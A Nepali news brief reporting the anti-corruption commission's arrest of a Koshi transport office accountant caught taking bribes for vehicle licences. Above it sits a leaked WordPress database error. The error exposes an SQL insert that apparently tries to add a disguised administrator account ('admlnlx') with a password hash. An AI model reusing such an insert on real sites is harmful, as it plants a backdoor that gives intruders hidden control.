WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bf2FdihRSDc7cLaVZq9BQE63UPxntg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 11:04:35', '', 'admlnlx', 'admlnlx')
सुनसरी, माघ १८ –
यातायात व्यवस्था कार्यालय कोशीका लेखापाल भूपेन्द्र कटुवाल ४० हजार घुससहित पक्राउ परेका छन् ।
इटहरीमा रहेको कार्यालय नजिकैको चियापसलमा सेवाग्राही दिपक थापा र भूपेन्द्र कटुवालसँग चार पाङ्ग्रे गाडीको लाइसेन्स बनाइदिन्छु भन्दै २०–२० हजार रुपैयाँ लिँदै गरेका कटुवाललाई अख्तियार दुरुपयोग अनुसन्धान आयोगले पक्राउ गरेको हो । थप अनुसन्धान भइरहेको आयोगले जनाएको छ ।